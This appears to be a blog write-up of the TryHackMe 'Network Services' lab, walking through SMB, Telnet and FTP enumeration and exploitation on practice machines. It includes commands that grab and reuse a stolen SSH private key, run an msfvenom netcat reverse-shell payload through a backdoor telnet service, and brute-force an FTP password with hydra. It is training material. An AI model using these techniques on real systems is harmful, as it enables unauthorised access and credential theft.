TryHackMe: Network Services Room Writeup

sy is typing
Nov 20, 2020 · 10 min read

The room: Learn about, then enumerate and exploit a variety of network services and misconfigurations. https://tryhackme.com/room/networkservices

Task 2: Understanding SMB

All the answers are found in the task description.

What does SMB stand for?

server message block

What type of protocol is SMB?

response-request

What do clients connect to servers using?

tcp/ip

What systems does Samba run on?

unix

Task 3: Enumerating SMB

From this task on is where the fun starts! First, let’s setup the env var to make the following commands easier.

export ip=10.10.0.0 # change it to your target machine's ip

Conduct an nmap scan of your choosing, How many ports are open?

Let’s run an nmap scan. As a reminder, these are what the flags mean:

  • -sV: service/version scan
nmap -sV --script vuln -oN nmap-$ip.out $ip

Now to check for open ports from the scan results.

cat nmap-$ip.out | grep open
I spy with my little eye.. 3 open ports

3

What ports is SMB running on?

From the same output above, we can see the 2 Samba services.

139/445

Let’s get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?

There seems to be no man page for enum4linux, but we can do enum4linux -h to see the flags.

option* (and for some reason the task description lists it as -A)

So let’s run a -a scan. There’s no flag to write to file, so let’s use tee to do that. This will take about 1 min to run.

enum4linux -a $ip | tee enum4linux-$ip.out

Once you reach the end, or this line below, we can cancel the process with Ctrl-C: [+] Enumerating users using SID S-1–22–1 and logon username '', password ''. Now let’s leisurely read the output to find the answers.

less enum4linux-$ip.out

The workgroup name is under the section “Enumerating Workgroup/Domain…”

workgroup

What comes up as the name of the machine?

The hint says to look under OS information, there aren’t really any labels, so it’s easy to miss.

polosmb

What operating system version is running?

This is in the same place as the machine name, this time it’s labelled!

6.1

What share sticks out as something we might want to investigate?

Let’s look further down at the “Share Enumeration…” section. Here is a list of share names.

I was actually more interested in the netlogon share, but oh wells..

profiles

Task 4: Exploiting SMB

What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?

The format is given in the task description. The tricky part is the port. Since we want to use the default port, the -p flag is not needed.

smbclient //10.10.10.2/secret -U suit

Does the share allow anonymous access? Y/N?

This directly follows the example syntax above, we just need to replace with different values. Those values are given in the task description (remember we’re interested in the profiles share. so let’s run this:

smbclient //$ip/profiles -U Anonymous

A password prompt will appear, but the task description tells us not to supply a password, so just hit Enter.

y

Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?

Now that we’re in the smb console, we have only limited commands. Type help to see what they are. We’re looking for interesting documents, so let’s ls.

Actually everything looks interesting to me..

Let’s check out the only non-hidden document with more.

more "Working From Home Information.txt"
Such a nice company to work for..

john cactus

What service has been configured to allow him to work from home?

We can glean this from the file we were just snooping on.

ssh

Okay! Now we know this, what directory on the share should we look in?

ssh is associated with an .ssh folder, so that’s our next destination.

.ssh

This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?

cd .ssh
ls

The standard key-pair is present. id_rsa is the private key, id_rsa.pub is the public key. The most useful is definitely the private key.

id_rsa

What is the smb.txt flag?

The smb.txt file is on the main server. We’re going to have to access that now. We’ll grab John’s keys and use that to ssh into the main server.

Let’s download both keys to our machine!

mget id_rsa*

Next, open another terminal window and copy both keys into our machine’s .ssh (mkdir if it’s not present). Then change permissions on the private key.

chmod 600 id_rsa

Now we can attempt to ssh into the main server! Before that, check the id_rsa.pub file to find the username at the end of the file.

ssh cactus@$ip

Quick troubleshoot:

  • Load key “/home/kali/.ssh/id_rsa”: bad permissions: revisit chmod step

Task 5: Understanding Telnet

All the answers are found in the task description.

What is Telnet?

application protocol

What has slowly replaced Telnet?

ssh

How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?

telnet 10.10.10.3 23

The lack of what, means that all Telnet communication is in plaintext?

encryption

Task 6: Enumerating Telnet

Set the env var again since the machine changed, then run the scan! This will take a while to run.

export ip=10.10.0.0 # change it to your target machine's ip
nmap -A -oN nmap-$ip.out -p- $ip

How many ports are open on the target machine?

We can get the information for the next few questions from searching for open

cat nmap-$ip.out | grep open

1

What port is this?

8012

This port is unassigned, but still lists the protocol it’s using, what protocol is this?

tcp

Now re-run the nmap scan, without the -p- tag, how many ports show up as open?

Run the scan again without -p-, let’s output into another file, then search for open again. There will nothing returned.

nmap -A -oN nmap-$ip-2.out $ip
cat nmap-$ip-2.out | grep open

0

Based on the title returned to us, what do we think this port could be used for?

Looking back at the original scan results, we can find a line that tells us the answer to the next few questions.

a backdoor

Who could it belong to? Gathering possible usernames is an important step in enumeration.

skidy

Task 7: Exploiting Telnet

Great! It’s an open telnet connection! What welcome message do we receive?

Our next step is to try opening a telnet connection. Install it if not present. The port used by telnet is custom, we actually saw it earlier while scanning the machine. Once we get in, we’ll see a welcome message.

sudo apt install telnet
telnet $ip 8012
At least they were honest..

SKIDY’S BACKDOOR.

Let’s try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)

Based on the welcome message, we know to use .HELP to check for available commands.

Then, try doing a .RUN. There are no return values nor acknowledgement.

n

Now, use the command “ping [local tun0 ip] -c 1” through the telnet session to see if we’re able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)

In another terminal session, run ifconfig and check for our local ip under tun0. For convenience save it to an env var.

ifconfig
export lhost=10.9.0.0 # change it to your machine's ip

In the same terminal, run tcpdump according to the task description.

sudo tcpdump ip proto \\icmp -i tun0

Then back to the telnet session, run a ping to your machine, following the task description.

.RUN ping 10.9.0.0 -c 1 # replace with your machine's ip

Check the terminal session running the tcpdump. There should be 2 logs, this means that the ping from the target machine to our machine succeeded, and implies we are able to execute system commands.

y

We’re going to generate a reverse shell payload using msfvenom. What word does the generated payload start with?

We don’t need tcpdump anymore, so kill it. Let’s set the lport env var for convenience (we have set lhost earlier). Then run msfvenom following the syntax in the task description to generate the payload.

export lport=4444
msfvenom -p cmd/unix/reverse_netcat lhost=$lhost lport=$lport R

The last line is the payload. It’s basically a command that starts with mkfifo and uses netcat.

mkfifo

What would the command look like for the listening port we selected in our payload?

The syntax is in the task description. These are what the flags mean:

  • -l: listen mode, for inbound connects

nc -lvp 4444

Success! What is the contents of flag.txt?

First run the netcat command to listen to our lport.

nc -lvp $lport

Then in the telnet session, run the payload generated by msfvenom earlier (basically copy/paste entire last line into the telnet session).

Once the payload is run, the netcat session from earlier will respond. We now have a reverse shell to the target! We can use this netcat session to send commands to the target machine. Run ls to get a list of files, we will see flag.txt. Print out the contents and we’re done here!

Task 8: Understanding FTP

Most the answers are found in the task description.

What communications model does FTP use?

We can find this info in the task description.

client-server

What’s the standard FTP port?

We can find this by googling around.

21

How many modes of FTP connection are there?

The active mode the and passive mode

2

Task 9: Enumerating FTP

How many ports are open on the target machine?

Let’s do our usual scan on this machine, this will take a while.

export ip=10.10.0.0 # change it to your target machine's ip 
nmap -sV -oN nmap-$ip.out $ip
cat nmap-$ip.out | grep open

2

What port is ftp running on?

21

What variant of FTP is running on it?

vsftpd

What is the name of the file in the anonymous FTP directory?

Login following the instructions from the task description. We can use help to view available commands. Then use ls to list the files.

PUBLIC_NOTICE.txt

What do we think a possible username could be?

Let’s snoop on the notice!

get PUBLIC_NOTICE.txt -

mike

Task 10: Exploiting FTP

What is the password for the user “mike”?

Say bye to ftp for now, then run the command from the task description with our user.

hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV $ip ft
Mike should’ve tried just a bit harder

password

What is ftp.txt?

Now that we’ve got Mike’s password, let’s repeat the steps and try to get to the file.

ftp $ip
mike
password
ls
get ftp.txt -

Other TryHackMe articles you may like

…and more in my Writeups and CTF Logs Catalogue.

I also write about software engineering topics:

Hi, if you enjoyed this post, I thought that you might also enjoy these t-shirts with code-inspired designs.

Don’t Code Me On That

Code fragments and comments

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store